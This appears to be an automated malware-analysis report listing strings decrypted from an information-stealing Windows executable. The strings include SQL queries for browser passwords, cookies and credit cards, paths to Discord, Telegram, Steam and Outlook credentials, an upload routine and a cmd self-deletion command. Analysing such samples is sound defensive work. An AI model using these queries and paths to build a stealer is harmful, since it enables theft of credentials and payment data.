Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Process32First
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: LocalFree
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: FindClose
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ReadFile
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: WriteFile
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CreateFileA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CopyFileA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetLastError
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GlobalFree
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: OpenProcess
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ole32.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: wininet.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: shell32.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: psapi.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SelectObject
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: BitBlt
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: DeleteObject
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GdipFree
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CoInitialize
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetDC
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CloseWindow
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: wsprintfA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CharToOemW
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: wsprintfW
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: InternetOpenA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: StrStrA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: StrCmpCW
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: PathMatchSpecA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RmStartSession
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RmRegisterResources
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RmGetList
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: RmEndSession
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3_open
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3_step
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3_column_text
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3_finalize
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3_close
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: encrypted_key
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: PATH
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: NSS_Init
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: NSS_Shutdown
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: PK11_Authenticate
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: C:\ProgramData\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: browser:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: profile:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: url:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: login:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: password:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Opera
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: OperaGX
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Network
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: cookies
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: .txt
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: TRUE
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: FALSE
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: autofill
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: history
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: cc
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: name:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: month:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: year:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: card:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Cookies
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Login Data
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Web Data
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: History
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: logins.json
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: formSubmitURL
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: usernameField
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: guid
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: cookies.sqlite
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: formhistory.sqlite
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: places.sqlite
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: plugins
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Local Extension Settings
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Sync Extension Settings
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: IndexedDB
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Opera Stable
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Opera GX Stable
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: CURRENT
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: chrome-extension_
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Local State
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: profiles.ini
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: chrome
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: opera
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: firefox
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: wallets
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ProductName
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: x32
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: x64
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ProcessorNameString
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: DisplayName
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: DisplayVersion
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Network Info:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - IP: IP?
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Country: ISO?
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: System Summary:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - HWID:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - OS:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Architecture:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - UserName:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Computer Name:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Local Time:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - UTC:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Language:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Keyboards:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Laptop:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Running Path:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - CPU:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Threads:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Cores:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - RAM:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - Display Resolution:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: - GPU:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: User Agents:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Installed Apps:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: All Users:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Current User:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Process List:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: system_info.txt
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: freebl3.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: mozglue.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: msvcp140.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: nss3.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: softokn3.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: vcruntime140.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \Temp\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: .exe
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: runas
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: open
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: /c start
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %DESKTOP%
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %APPDATA%
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %USERPROFILE%
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: %RECENT%
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: *.lnk
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: files
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \discord\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: key_datas
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: map*
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Telegram
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Tox
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: *.tox
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: *.ini
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Password
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: 00000001
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: 00000002
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: 00000003
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: 00000004
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Pidgin
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \.purple\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: accounts.xml
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: token:
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: SteamPath
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \config\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ssfn*
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: config.vdf
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: loginusers.vdf
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \Steam\
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: sqlite3.dll
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: browsers
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: done
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: soft
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: https
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: POST
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: HTTP/1.1
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: hwid
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: build
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: token
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: file_name
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: file
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: message
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_0040A2B0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00419030
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	0_2_0040C920
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0040A210
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_004072A0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFBB040 BCryptGenRandom,SystemFunction036,	0_2_6CFBB040

Compliance

Detected unpacking (overwrites its own PE header)

